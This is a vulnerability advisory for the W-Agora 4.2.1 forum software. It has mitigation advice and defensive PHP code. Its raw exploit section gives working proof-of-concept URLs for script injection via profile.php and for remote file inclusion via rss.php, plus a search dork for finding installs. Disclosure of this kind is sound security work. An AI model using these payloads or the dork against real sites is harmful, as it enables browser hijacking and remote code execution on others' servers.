Vendor: W-Agora
By: indoushka
CVSS: 8.8 (HIGH)
Type: XSS and File Inclusion
CWE: 79 (XSS) and 22 (File Inclusion)
Product Name: W-Agora
Affected Version From: 4.2.1
Affected Version To: 4.2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:w-agora:w-agora:4.2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
Year: 2009

W-Agora v.4.2.1 Multiple Vulnerabilities

W-Agora v.4.2.1 is vulnerable to cross-site scripting (XSS) and file inclusion. The XSS is exploited by sending a crafted URL to a victim: the script embedded in the URL's showuser parameter of profile.php is executed in the victim's browser when the link is opened. The bn parameter of rss.php can be pointed at a file on a remote server, which is then included by the application and can be used to execute arbitrary code.

Mitigation:

The application should validate user input and filter or encode any script content before rendering it in a page. It should also restrict file inclusion to files from trusted sources, rather than accepting a path or URL supplied by the user.
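As an added illustration of that mitigation (not W-Agora's own code, whose source the advisory does not show), the two parameters from the advisory are handled with a board-name allowlist and output encoding; the configuration directory layout, file names and the "vulnerable pattern" comments are assumptions:

```php
<?php
// Added example, not taken from W-Agora. The vulnerable patterns in the
// comments are assumed; the page only shows the exploit URLs.
declare(strict_types=1);

// Directory holding the per-board config files rss.php may include
// (assumed layout; adjust to the real install).
const SITE_CONF_DIR = __DIR__ . '/conf';

/**
 * Resolve the 'bn' (board name) parameter to a file under SITE_CONF_DIR.
 * Returns null for anything that is not a plain identifier, so values such
 * as "http://127.0.0.1/c.txt?" or "../../etc/passwd" never reach include().
 */
function resolve_board_config(string $bn): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $bn)) {
        return null;
    }
    $base = realpath(SITE_CONF_DIR);
    $path = realpath(SITE_CONF_DIR . '/' . $bn . '.php');
    // realpath() resolves symlinks and '..'; the result must stay inside $base.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

/** Encode a user-supplied value for safe insertion into HTML text. */
function html_safe(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern (assumed, do not use): include($_GET['bn'] . '/config.php');
$config = resolve_board_config((string)($_GET['bn'] ?? ''));
if ($config === null) {
    http_response_code(400);
    exit('Unknown board');
}
require $config;

// Vulnerable pattern (assumed, do not use): echo '<h1>' . $_GET['showuser'] . '</h1>';
echo '<h1>' . html_safe((string)($_GET['showuser'] ?? '')) . '</h1>';
```

Independently of the code, setting allow_url_include=Off in php.ini stops include() from fetching remote URLs at all, which closes the rss.php vector even where the allowlist is missing.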

Exploit-DB raw data:

========================================================================================
| # Title    : W-Agora v.4.2.1 Multiple Vulnerabilities
| # Author   : indoushka
| # email    : indoushka@hotmail.com
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)
| # Total alerts found : 2
|                High  : 2
|              Medium  :
|                  Low :
|       Informational  :
| # Web Site : www.iq-ty.com
| # Dork     : Powered by Forums W-Agora
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)
| # Bug      : Multiple
======================      Exploit By indoushka       =================================
 # Exploit  :

 1- XSS

http://127.0.0.1/w-agora/profile.php?site=http127001wagora&showuser=%3Cscript%3Ealert(213771818860)%3C/script%3E

 2- File inclusion

http://127.0.0.1/w-agora/rss.php?site=http127001wagora&bn=http://127.0.0.1/c.txt?

================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
-------------------------------------------------------------------------------------------